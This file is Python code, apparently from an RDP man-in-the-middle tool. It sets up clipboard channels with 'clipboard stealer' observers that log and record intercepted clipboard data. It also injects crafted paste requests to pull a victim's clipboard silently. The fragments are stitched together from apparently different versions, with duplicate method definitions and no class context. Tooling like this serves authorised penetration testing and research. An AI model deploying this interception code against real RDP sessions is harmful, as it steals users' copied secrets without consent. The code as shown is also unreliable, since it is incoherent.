def buildClipboardChannel(self, mcs: MCSLayer, userID: int,
channelID: int) -> MCSServerChannel:
"""
:type mcs: MCSLayer
:param userID: The mcs user that builds the channel
:param channelID: The channel ID to use to communicate in that channel
:return: MCSServerChannel that handles the Clipboard virtual channel traffic from the client to the MITM.
"""
# Create all necessary layers
channel = MCSServerChannel(mcs, userID, channelID)
securityLayer = self.createSecurityLayer()
virtualChannelLayer = VirtualChannelLayer()
clipboardLayer = ClipboardLayer()
Layer.chain(channel, securityLayer, virtualChannelLayer,
clipboardLayer)
# Create and link the MITM Observer for the server side to the clipboard layer.
# Also link both MITM Observers (client and server) so they can send traffic the other way.
peer = self.client.getChannelObserver(channelID)
passiveClipboardObserver = PassiveClipboardStealer(
clipboardLayer, self.recorder, self.log)
peer.passiveClipboardObserver = passiveClipboardObserver
passiveClipboardObserver.setPeer(peer)
clipboardLayer.addObserver(passiveClipboardObserver)
return channel
def handlePDU(self, pdu: ClipboardPDU, destination: ClipboardLayer):
"""
Check if the PDU is a FormatDataResponse. If so, log and record the clipboard data.
:param pdu: the PDU that was received
:param destination: the destination layer
"""
if not isinstance(pdu, FormatDataResponsePDU):
destination.sendPDU(pdu)
else:
if self.forwardNextDataResponse:
destination.sendPDU(pdu)
if pdu.msgFlags == ClipboardMessageFlags.CB_RESPONSE_OK:
clipboardData = self.decodeClipboardData(
pdu.requestedFormatData)
if clipboardData != "\x01\x00":
self.log.info("Clipboard data: %(clipboardData)r",
{"clipboardData": clipboardData})
self.recorder.record(pdu, PlayerPDUType.CLIPBOARD_DATA)
if self.forwardNextDataResponse:
# Means it's NOT a crafted response
self.statCounter.increment(STAT.CLIPBOARD_PASTE)
self.forwardNextDataResponse = True
def buildClipboardChannel(self, mcs: MCSLayer, userID: int,
channelID: int) -> MCSClientChannel:
"""
:param mcs: The MCS Layer to transport traffic
:param userID: The mcs user that builds the channel
:param channelID: The channel ID to use to communicate in that channel
:return: MCSClientChannel that handles the Clipboard virtual channel traffic from the server to the MITM.
"""
# Create all necessary layers
channel = MCSClientChannel(mcs, userID, channelID)
securityLayer = self.createSecurityLayer()
virtualChannelLayer = VirtualChannelLayer()
clipboardLayer = ClipboardLayer()
Layer.chain(channel, securityLayer, virtualChannelLayer,
clipboardLayer)
# Create and link the MITM Observer for the client side to the clipboard layer.
activeClipboardObserver = ActiveClipboardStealer(
clipboardLayer, self.recorder, self.log)
clipboardLayer.addObserver(activeClipboardObserver)
self.channelObservers[channelID] = activeClipboardObserver
return channel
def sendPasteRequest(self, destination: ClipboardLayer):
"""
Send a FormatDataRequest to request the clipboard data.
Sets forwardNextDataResponse to False to make sure that this request is not actually transferred to the other end.
"""
formatDataRequestPDU = FormatDataRequestPDU(ClipboardFormatNumber.GENERIC)
destination.sendPDU(formatDataRequestPDU)
self.forwardNextDataResponse = False
def buildClipboardChannel(self, client: MCSServerChannel,
server: MCSClientChannel):
"""
Build the MITM component for the clipboard channel.
:param client: MCS channel for the client side
:param server: MCS channel for the server side
"""
clientSecurity = self.state.createSecurityLayer(
ParserMode.SERVER, True)
clientVirtualChannel = VirtualChannelLayer()
clientLayer = ClipboardLayer()
serverSecurity = self.state.createSecurityLayer(
ParserMode.CLIENT, True)
serverVirtualChannel = VirtualChannelLayer()
serverLayer = ClipboardLayer()
clientLayer.addObserver(
LayerLogger(self.getClientLog(MCSChannelName.CLIPBOARD)))
serverLayer.addObserver(
LayerLogger(self.getServerLog(MCSChannelName.CLIPBOARD)))
LayerChainItem.chain(client, clientSecurity, clientVirtualChannel,
clientLayer)
LayerChainItem.chain(server, serverSecurity, serverVirtualChannel,
serverLayer)
mitm = ActiveClipboardStealer(clientLayer, serverLayer,
self.getLog(MCSChannelName.CLIPBOARD),
self.recorder, self.statCounter)
self.channelMITMs[client.channelID] = mitm
def handlePDU(self, pdu: ClipboardPDU, destination: ClipboardLayer):
"""
Handle an incoming clipboard message.
:param pdu: the PDU that was received
:param destination: the destination layer
"""
forward = True
# Handle file transfers
if type(pdu) in self.dispatch:
forward = self.dispatch[type(pdu)](pdu)
assert forward is not None, "ClipboardMITM: PDU handler must return True or False!"
if forward:
destination.sendPDU(pdu)
